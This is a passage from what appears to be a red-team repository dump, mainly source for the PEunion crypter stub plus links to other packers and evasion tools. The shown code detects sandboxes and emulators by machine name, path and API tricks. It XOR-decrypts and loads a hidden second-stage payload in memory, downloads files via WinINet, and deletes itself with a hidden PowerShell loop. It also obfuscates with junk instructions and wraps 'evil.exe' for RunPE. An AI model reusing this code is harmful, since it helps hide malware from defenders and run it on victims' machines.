18 | byte[] memory = new byte[/**/1024 * /**/1024 * /**/100];
19 | for (int i = /**/0; i < memory.Length; i++) memory[i] = 255;
20 | }
21 |
22 | // SetErrorMode return value must match previous value
23 | {
24 | setErrorMode((uint)/**/1024);
25 | if (setErrorMode((uint)/**/0) != /**/1024) Environment.Exit(/**/0);
26 | }
27 |
28 | // VirtualAllocExNuma must work
29 | {
30 | if (virtualAllocExNuma((IntPtr)(/**/-1), (IntPtr)/**/0, (uint)/**/1000, (uint)/**/0x3000, (uint)/**/0x4, (uint)/**/0) == (IntPtr)/**/0) Environment.Exit(/**/0);
31 | }
32 |
33 | // Computer name is not a known emulator name:
34 | // - NfZtFbPfH
35 | // - ELICZ
36 | // - tz
37 | // - MAIN
38 | {
39 | if (Environment.MachineName == /**/"NfZtFbPfH" ||
40 | Environment.MachineName == /**/"ELICZ" ||
41 | Environment.MachineName == /**/"tz" ||
42 | Environment.MachineName == /**/"MAIN") Environment.Exit(/**/0);
43 | }
44 |
45 | // Executable path is not a known emulator path:
46 | // - C:\[...]\mwsmpl.exe
47 | // - C:\SELF.EXE
48 | // - myapp.exe
49 | {
50 | string path = Assembly.GetEntryAssembly().Location;
51 | if (path.Equals(/**/"C:\\Documents and Settings\\Administrator\\My Documents\\mwsmpl.exe", StringComparison.OrdinalIgnoreCase) ||
52 | path.Equals(/**/"C:\\SELF.EXE", StringComparison.OrdinalIgnoreCase) ||
53 | Path.GetFileName(path).Equals(/**/"myapp.exe", StringComparison.OrdinalIgnoreCase)) Environment.Exit(/**/0);
54 | }
55 | }
56 | }
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/dotnet/GetResource.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Reflection;
3 | using System.Resources;
4 |
5 | public partial class __Stub
6 | {
7 | ///
8 | /// byte[] GetResource(string name)
9 | ///
10 | public static byte[] __GetResource(string __name)
11 | {
12 | Assembly assembly = Assembly.GetExecutingAssembly();
13 | using (ResourceReader reader = new ResourceReader(assembly.GetManifestResourceStream(assembly.GetManifestResourceNames()[/**/0])))
14 | {
15 | // Get resource
16 | string type;
17 | byte[] resourceData;
18 | reader.GetResourceData(__name, out type, out resourceData);
19 |
20 | // The first 4 bytes contain the size of resourceData and must be removed.
21 | byte[] data = new byte[resourceData.Length - /**/4];
22 | Buffer.BlockCopy(resourceData, /**/4, data, /**/0, data.Length);
23 |
24 | return data;
25 | }
26 | }
27 | }
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/dotnet/Invoke.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Threading;
3 |
4 | public partial class __Stub
5 | {
6 | ///
7 | /// void Invoke(byte[] payload)
8 | ///
9 | public static void __Invoke(byte[] __payload)
10 | {
11 | Thread thread = new Thread(() =>
12 | {
13 | Assembly.Load(__payload).EntryPoint.Invoke(null, new[] { __CommandLineArguments });
14 | });
15 |
16 | thread.TrySetApartmentState(ApartmentState.STA);
17 | thread.Start();
18 | }
19 | }
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/dotnet/Resources/default.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/dotnet/Resources/elevated.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/dotnet/Stage2.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using System.Linq;
4 | using System.Reflection;
5 | using System.Windows.Forms;
6 |
7 | public partial class __Stub
8 | {
9 | public static string __CommandLine;
10 | public static string[] __CommandLineArguments;
11 |
12 | ///
13 | /// void Main(string[] args)
14 | ///
15 | [STAThread]
16 | public static void Main(string[] __args)
17 | {
18 | // args[0] = Combined commandline arguments
19 | // args[1..n] = Separated commandline arguments
20 | // (Redundant, but easier to process)
21 | __CommandLine = __args[/**/0];
22 | __CommandLineArguments = __args.Skip(/**/1).ToArray();
23 |
24 | //{MAIN}
25 |
26 | end:
27 |
28 | #if MELT
29 | try
30 | {
31 | // Start powershell.exe
32 | // The command tries to delete this file every 100ms for a duration of up to 1 minute
33 | Process.Start(new ProcessStartInfo
34 | {
35 | FileName = /**/"powershell",
36 | Arguments = /**/"$file='" + Assembly.GetEntryAssembly().Location + /**/"';for($i=1;$i -le 600 -and (Test-Path $file -PathType leaf);$i++){Remove-Item $file;Start-Sleep -m 100}",
37 | CreateNoWindow = true,
38 | WindowStyle = (ProcessWindowStyle)/**/1
39 | });
40 | }
41 | catch
42 | {
43 | }
44 | #endif
45 | return;
46 | }
47 | }
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/dotnet/Stub.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.IO;
3 | using System.Linq;
4 | using System.Reflection;
5 | using System.Resources;
6 |
7 | public partial class __Stub
8 | {
9 | ///
10 | /// void Main(string[] args)
11 | ///
12 | [STAThread]
13 | public static void Main(string[] __args)
14 | {
15 | try
16 | {
17 | // Detect emulator
18 | __DetectEmulator();
19 | }
20 | catch
21 | {
22 | }
23 |
24 | try
25 | {
26 | //{STAGE2HEADER}
27 |
28 | using (ResourceReader reader = new ResourceReader(Assembly.GetExecutingAssembly().GetManifestResourceStream(resourceFileName)))
29 | {
30 | // Get stage2 executable from resources
31 | string type;
32 | byte[] resourceData;
33 | reader.GetResourceData(resourceName, out type, out resourceData);
34 |
35 | // Decrypt stage2
36 | byte[] stage2 = new byte[stage2Size];
37 | for (int i = /**/0, j = /**/4; i < stage2Size; i++)
38 | {
39 | stage2[i] = (byte)(resourceData[j++] ^ key);
40 |
41 | if ((paddingMask & 1) == 1) j += paddingByteCount;
42 |
43 | key = (key >> 5 | key << (32 - 5)) * 7;
44 | paddingMask = paddingMask >> 1 | paddingMask << (32 - 1);
45 | }
46 |
47 | // Invoke stage2 executable
48 | // - args[0] = Combined commandline arguments (Environment.CommandLine)
49 | // - args[1..n] = Separated commandline arguments
50 | Assembly.Load(stage2).EntryPoint.Invoke(null, new[] { new[] { Environment.CommandLine }.Concat(__args).ToArray() });
51 | }
52 | }
53 | catch
54 | {
55 | }
56 | }
57 | }
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/pe32/Api/msvcrt.inc:
--------------------------------------------------------------------------------
1 | import msvcrt, \
2 | malloc, 'malloc', \
3 | free, 'free', \
4 | memset, 'memset', \
5 | strcmp, 'strcmp', \
6 | strcmpi, '_strcmpi', \
7 | strcpy, 'strcpy'
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/pe32/Api/shlwapi.inc:
--------------------------------------------------------------------------------
1 | import shlwapi, \
2 | PathFindFileNameA, 'PathFindFileNameA'
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/pe32/Compression.asm:
--------------------------------------------------------------------------------
1 | proc Decompress Data:DWORD, Size:DWORD, DecompressedSize:DWORD
2 | local Decompressed:DWORD
3 | local FinalDecompressedSize:DWORD
4 |
5 | mov [Decompressed], 0
6 |
7 | ; Allocate decompressed data
8 | pebcall PEB_Kernel32Dll, PEB_GetProcessHeap
9 | pebcall PEB_NtdllDll, PEB_RtlAllocateHeap, eax, 0, [DecompressedSize]
10 | test eax, eax
11 | jz .ret
12 | mov [Decompressed], eax
13 |
14 | ; Decompress buffer
15 | lea eax, [FinalDecompressedSize]
16 | pebcall PEB_NtdllDll, PEB_RtlDecompressBuffer, COMPRESSION_FORMAT_LZNT1, [Decompressed], [DecompressedSize], [Data], [Size], eax
17 | test eax, eax
18 | jz .ret
19 |
20 | ; Free buffer, if decompression failed
21 | pebcall PEB_Kernel32Dll, PEB_GetProcessHeap
22 | pebcall PEB_Kernel32Dll, PEB_HeapFree, eax, 0, [Decompressed]
23 | mov [Decompressed], 0
24 |
25 | .ret:
26 | mov eax, [Decompressed]
27 | ret
28 | endp
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/pe32/Download.asm:
--------------------------------------------------------------------------------
1 | DOWNLOAD_CHUNK_SIZE = 1024 * 1024
2 |
3 | proc Download Url:DWORD, Size:DWORD
4 | local Internet:DWORD
5 | local UrlHandle:DWORD
6 | local File:DWORD
7 | local BytesRead:DWORD
8 | local TotalBytesRead:DWORD
9 | local ReadSuccess:DWORD
10 |
11 | mov [Internet], 0
12 | mov [UrlHandle], 0
13 | mov [File], 0
14 | mov [BytesRead], 0
15 | mov [TotalBytesRead], 0
16 |
17 | ; Create internet connection
18 | pebcall PEB_WininetDll, PEB_InternetOpenW, NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0
19 | test eax, eax
20 | jz .ret
21 | mov [Internet], eax
22 |
23 | ; Create URL handle
24 | pebcall PEB_WininetDll, PEB_InternetOpenUrlW, [Internet], [Url], NULL, 0, 0, 0
25 | test eax, eax
26 | jz .ret
27 | mov [UrlHandle], eax
28 |
29 | ; Allocate buffer
30 | pebcall PEB_Kernel32Dll, PEB_GetProcessHeap
31 | pebcall PEB_NtdllDll, PEB_RtlAllocateHeap, eax, 0, DOWNLOAD_CHUNK_SIZE
32 | test eax, eax
33 | jz .ret
34 | mov [File], eax
35 |
36 | .L_download:
37 | ; Download chunk
38 | mov eax, [File]
39 | add eax, [TotalBytesRead]
40 | lea ebx, [BytesRead]
41 | pebcall PEB_WininetDll, PEB_InternetReadFile, [UrlHandle], eax, DOWNLOAD_CHUNK_SIZE, ebx
42 | mov [ReadSuccess], eax
43 |
44 | ; Add to total size
45 | mov eax, [BytesRead]
46 | add [TotalBytesRead], eax
47 |
48 | ; Increase buffer size
49 | pebcall PEB_Kernel32Dll, PEB_GetProcessHeap
50 | mov ebx, [TotalBytesRead]
51 | add ebx, DOWNLOAD_CHUNK_SIZE
52 | pebcall PEB_NtdllDll, PEB_RtlReAllocateHeap, eax, 0, [File], ebx
53 | mov [File], eax
54 | test eax, eax
55 | jz .ret
56 |
57 | ; InternetReadFile completed, if it returned TRUE and BytesRead == 0
58 | cmp [ReadSuccess], 0
59 | je .L_download
60 | cmp [BytesRead], 0
61 | jne .L_download
62 |
63 | .ret:
64 | ; Close handles
65 | pebcall PEB_WininetDll, PEB_InternetCloseHandle, [UrlHandle]
66 | pebcall PEB_WininetDll, PEB_InternetCloseHandle, [Internet]
67 |
68 | ; Store allocated memory in eax
69 | mov eax, [File]
70 |
71 | ; Store size of downloaded file in [Size] out parameter
72 | mov edx, [TotalBytesRead]
73 | mov ebx, [Size]
74 | mov [ebx], edx
75 |
76 | ret
77 | endp
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/pe32/Melt.asm:
--------------------------------------------------------------------------------
1 | proc Melt
2 | local ExecutablePath[MAX_PATH + 1]:WORD
3 | local Verb[10]:WORD
4 | local FileName[50]:WORD
5 | local Arguments[MAX_PATH + 1]:WORD
6 | local Arguments[MAX_PATH + 1]:WORD
7 |
8 | ; Get executable filename
9 | lea eax, [ExecutablePath]
10 | pebcall PEB_Kernel32Dll, PEB_GetModuleFileNameW, NULL, eax, MAX_PATH
11 | cmp eax, 0
12 | jle .ret
13 |
14 | ; Verb: "open"
15 | lea eax, [Verb]
16 | lodstrw 'open'
17 |
18 | ; Filename: "powershell"
19 | lea eax, [FileName]
20 | lodstrw 'powershell'
21 |
22 | ; Load arguments part 1
23 | lea eax, [Arguments]
24 | lodstrw '$file='''
25 |
26 | ; Append executable filename to arguments
27 | lea eax, [Arguments]
28 | lea ebx, [ExecutablePath]
29 | pebcall PEB_Kernel32Dll, PEB_lstrcatW, eax, ebx
30 |
31 | ; Append arguments part 2
32 | lea eax, [Arguments]
33 | pebcall PEB_Kernel32Dll, PEB_lstrlenW, eax
34 | lea eax, [Arguments + eax * 2]
35 | lodstrw ''';for($i=1;$i -le 600 -and (Test-Path $file -PathType leaf);$i++){Remove-Item $file;Start-Sleep -m 100}'
36 |
37 | ; Execute
38 | lea eax, [Verb]
39 | lea ebx, [FileName]
40 | lea ecx, [Arguments]
41 | pebcall PEB_Shell32Dll, PEB_ShellExecuteW, NULL, eax, ebx, ecx, NULL, SW_HIDE
42 |
43 | .ret:
44 | xor eax, eax
45 | ret
46 | endp
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/pe32/Obfuscator/nop.txt:
--------------------------------------------------------------------------------
1 | ; Nop-like instructions used by the obfuscator
2 |
3 | ; A semicolon separates each code block.
4 | ; $1..$8 A random general purpose register. Only registers from 'register.txt' are used.
5 | ; $rnd1..$rnd3 A 32-bit random number literal
6 |
7 | mov $1, $1
8 | ;
9 | xchg $1, $1
10 | ;
11 | xchg $1, $2
12 | xchg $2, $1
13 | ;
14 | push $1
15 | pop $1
16 | ;
17 | push $1 $2
18 | pop $2 $1
19 | ;
20 | pushfd
21 | xor $1, $rnd1
22 | xor $1, $rnd1
23 | popfd
24 | ;
25 | pushfd
26 | inc $1
27 | dec $1
28 | popfd
29 | ;
30 | pushfd
31 | push $1
32 | add esp, 4
33 | popfd
34 | ;
35 | pushfd
36 | push $rnd1
37 | add esp, 4
38 | popfd
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/pe32/Obfuscator/nop_minimal.txt:
--------------------------------------------------------------------------------
1 | ; Nop-like instructions used by the obfuscator
2 |
3 | ; This is the "minimal" set that is used to obfuscate tight loops.
4 | ; Between "obfoff" and "obfon", only one obfuscation code is added between each line to avoid performance impacts.
5 |
6 | ; A semicolon separates each code block.
7 | ; $1..$8 A random general purpose register. Only registers from 'register.txt' are used.
8 | ; $rnd1..$rnd3 A 32-bit random number literal
9 |
10 | mov $1, $1
11 | ;
12 | xchg $1, $1
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/pe32/Obfuscator/register.txt:
--------------------------------------------------------------------------------
1 | ; Registers that are used by the obfuscator to create random instructions
2 |
3 | eax
4 | ebx
5 | ecx
6 | edx
7 | esi
8 | edi
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/pe32/Resources/default.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/pe32/Resources/elevated.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/pe32/Stage2.asm:
--------------------------------------------------------------------------------
1 | format PE GUI 4.0
2 | entry Main
3 |
4 | include 'win32wx.inc'
5 | include 'nt.inc'
6 | include 'PebApi.inc'
7 |
8 | section '.text' code readable executable
9 |
10 | proc Main
11 | local DllName[MAX_PATH + 1]:WORD
12 | local Payload:DWORD
13 | local PayloadSize:DWORD
14 |
15 | ; LoadLibrary user32.dll
16 | lea eax, [DllName]
17 | lodstrw 'user32.dll'
18 | pebcall PEB_Kernel32Dll, PEB_LoadLibraryW, eax
19 |
20 | ; LoadLibrary shell32.dll
21 | lea eax, [DllName]
22 | lodstrw 'shell32.dll'
23 | pebcall PEB_Kernel32Dll, PEB_LoadLibraryW, eax
24 |
25 | ; LoadLibrary shlwapi.dll
26 | lea eax, [DllName]
27 | lodstrw 'shlwapi.dll'
28 | pebcall PEB_Kernel32Dll, PEB_LoadLibraryW, eax
29 |
30 | ; LoadLibrary wininet.dll
31 | lea eax, [DllName]
32 | lodstrw 'wininet.dll'
33 | pebcall PEB_Kernel32Dll, PEB_LoadLibraryW, eax
34 |
35 | ; ==========================================================================
36 | ; == Custom assembly ==
37 | ; ==========================================================================
38 |
39 | ;{MAIN}
40 |
41 | ; ==========================================================================
42 | ; == End of custom assembly ==
43 | ; ==========================================================================
44 | .ret:
45 |
46 | ;{MELT}
47 |
48 | pebcall PEB_Kernel32Dll, PEB_ExitProcess, 0
49 | ret
50 | endp
51 |
52 | include 'PebApi.asm'
53 | include 'Melt.asm'
54 | include 'Compression.asm'
55 | include 'Download.asm'
56 | include 'RunPE.asm'
57 | include 'Drop.asm'
58 |
59 | include 'EmbeddedStrings.inc'
60 | include 'EmbeddedSources.inc'
--------------------------------------------------------------------------------
/contrib/PEunion/lib/BytecodeApi.FileFormats.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/PEunion/lib/BytecodeApi.FileFormats.dll
--------------------------------------------------------------------------------
/contrib/PEunion/lib/BytecodeApi.FileIcons.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/PEunion/lib/BytecodeApi.FileIcons.dll
--------------------------------------------------------------------------------
/contrib/PEunion/lib/BytecodeApi.UI.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/PEunion/lib/BytecodeApi.UI.dll
--------------------------------------------------------------------------------
/contrib/PEunion/lib/BytecodeApi.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/PEunion/lib/BytecodeApi.dll
--------------------------------------------------------------------------------
/contrib/PEunion/lib/HtmlRenderer.WPF.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/PEunion/lib/HtmlRenderer.WPF.dll
--------------------------------------------------------------------------------
/contrib/PEunion/lib/HtmlRenderer.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/PEunion/lib/HtmlRenderer.dll
--------------------------------------------------------------------------------
/contrib/PEunion/lib/MarkdownSharp.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/PEunion/lib/MarkdownSharp.dll
--------------------------------------------------------------------------------
/contrib/PEunion/lib/PEunion.Compiler.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/PEunion/lib/PEunion.Compiler.dll
--------------------------------------------------------------------------------
/contrib/PEunion/peubuild.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/PEunion/peubuild.exe
--------------------------------------------------------------------------------
/contrib/PEunion/peubuild.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/contrib/ScareCrow/ScareCrow:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ScareCrow/ScareCrow
--------------------------------------------------------------------------------
/contrib/ScareCrow/ScareCrow.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ScareCrow/ScareCrow.exe
--------------------------------------------------------------------------------
/contrib/ScareCrow/libcrypto-3-x64.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ScareCrow/libcrypto-3-x64.dll
--------------------------------------------------------------------------------
/contrib/ScareCrow/libcurl.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ScareCrow/libcurl.dll
--------------------------------------------------------------------------------
/contrib/ScareCrow/libssl-3-x64.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ScareCrow/libssl-3-x64.dll
--------------------------------------------------------------------------------
/contrib/ScareCrow/osslsigncode:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ScareCrow/osslsigncode
--------------------------------------------------------------------------------
/contrib/ScareCrow/osslsigncode.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ScareCrow/osslsigncode.exe
--------------------------------------------------------------------------------
/contrib/_project-files/CallObf/configExample.ini:
--------------------------------------------------------------------------------
1 | ; Template for the config file:
2 | ; * Sections can be written as:
3 | ; [dll_name]
4 | ; old_sym=new_sym
5 | ; * The dll name is case insensitive, but
6 | ; the old and the new symbols are not.
7 | ; * You can use the wildcard on both the
8 | ; dll name and the old symbol.
9 | ; * You can use '#' at the start of
10 | ; the old or the new symbol to flag
11 | ; an ordinal.
12 | ; * The new symbol should be exported
13 | ; by the dll so the windows loader can resolve it.
14 | ; For example:
15 | ; * Obfuscating all of the symbols
16 | ; imported from user32.dll with ordinal 1600.
17 | [user32.dll]
18 | *=#1600
19 | ; * Obfuscating symbols imported from both
20 | ; kernel32.dll and kernelbase.dll with Sleep.
21 | [kernel*.dll]
22 | *=Sleep
23 | ; * Obfuscating fprintf with exit.
24 | [*]
25 | fprintf=exit
--------------------------------------------------------------------------------
/contrib/_project-files/ConfuserEx/beds-maximum.crproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
--------------------------------------------------------------------------------
/contrib/_project-files/ConfuserEx/maximum.crproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
--------------------------------------------------------------------------------
/contrib/_project-files/ConfuserEx/mkaring-maximum.crproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
--------------------------------------------------------------------------------
/contrib/_project-files/ConfuserEx/neo-maximum.crproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/contrib/_project-files/PEunion/dotnet64.peu:
--------------------------------------------------------------------------------
1 | [stub]
2 | type = net64
3 | padding = 50
4 |
5 | [manifest]
6 | template = default
7 |
8 | [source.embedded]
9 | id = 4317a448-3376-4830-92df-8b6a3ff0b02d
10 | path = evil.exe
11 | compress = true
12 |
13 | [action.invoke]
14 | source = 4317a448-3376-4830-92df-8b6a3ff0b02d
15 |
--------------------------------------------------------------------------------
/contrib/_project-files/PEunion/dotnet86.peu:
--------------------------------------------------------------------------------
1 | [stub]
2 | type = net32
3 | padding = 50
4 |
5 | [manifest]
6 | template = default
7 |
8 | [source.embedded]
9 | id = 4317a448-3376-4830-92df-8b6a3ff0b02d
10 | path = evil.exe
11 | compress = true
12 |
13 | [action.invoke]
14 | source = 4317a448-3376-4830-92df-8b6a3ff0b02d
15 |
--------------------------------------------------------------------------------
/contrib/_project-files/PEunion/native86.peu:
--------------------------------------------------------------------------------
1 | [stub]
2 | type = pe32
3 | padding = 50
4 |
5 | [manifest]
6 | template = default
7 |
8 | [source.embedded]
9 | id = 97b6fbca-50d8-4efc-92d8-44da11071184
10 | path = evil.exe
11 | compress = true
12 |
13 | [action.runpe]
14 | source = 97b6fbca-50d8-4efc-92d8-44da11071184
15 |
--------------------------------------------------------------------------------
/contrib/_project-files/netreactor-projects/net-reactor-full1.nrproj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/_project-files/netreactor-projects/net-reactor-full1.nrproj
--------------------------------------------------------------------------------
/contrib/_project-files/themida-projects/advanced-tiger-red.tmd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/_project-files/themida-projects/advanced-tiger-red.tmd
--------------------------------------------------------------------------------
/contrib/_project-files/vmprotect-projects/full-vmprotect.vmp:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
--------------------------------------------------------------------------------
/contrib/_project-files/vmprotect/full-vmprotect.vmp:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
--------------------------------------------------------------------------------
/contrib/amber/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2017 Ege Balcı
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/contrib/amber/amber.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/amber/amber.exe
--------------------------------------------------------------------------------
/contrib/amber/keystone.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/amber/keystone.dll
--------------------------------------------------------------------------------
/contrib/denim/denim.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/denim/denim.exe
--------------------------------------------------------------------------------
/contrib/donut/donut.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/donut/donut.exe
--------------------------------------------------------------------------------
/contrib/exiftool.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/exiftool.exe
--------------------------------------------------------------------------------
/contrib/packer64/Packer.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/packer64/Packer.exe
--------------------------------------------------------------------------------
/contrib/packer64/PackerStub.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/packer64/PackerStub.exe
--------------------------------------------------------------------------------
/contrib/pe2shc/injector32.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/pe2shc/injector32.exe
--------------------------------------------------------------------------------
/contrib/pe2shc/injector64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/pe2shc/injector64.exe
--------------------------------------------------------------------------------
/contrib/pe2shc/pe2shc.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/pe2shc/pe2shc.exe
--------------------------------------------------------------------------------
/contrib/pe2shc/runshc32.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/pe2shc/runshc32.exe
--------------------------------------------------------------------------------
/contrib/pe2shc/runshc64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/pe2shc/runshc64.exe
--------------------------------------------------------------------------------
/contrib/peCloakCapstone/README.md:
--------------------------------------------------------------------------------
1 | peCloak - Capstone
2 | ==================
3 |
